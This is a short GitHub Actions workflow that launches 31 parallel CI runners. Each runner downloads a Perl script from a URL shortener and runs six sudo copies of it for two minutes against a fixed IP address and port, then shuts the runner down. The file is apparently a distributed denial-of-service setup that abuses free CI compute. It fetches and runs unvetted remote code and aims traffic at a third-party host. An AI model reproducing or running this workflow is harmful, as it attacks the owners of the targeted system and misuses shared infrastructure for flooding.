name: Ubuntu VDS 40 saniye d

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 31
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31]

    steps:
      - name: OK !
        run: |
          wget https://curl.by/Cgd2m/dc.pl -O dc.pl
          chmod +x dc.pl
          PIDS=()
          for i in {1..6}; do
            sudo timeout 120 perl dc.pl 104.29.142.109 19313 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 120
          sudo shutdown now
          sudo reboot
          exit 0
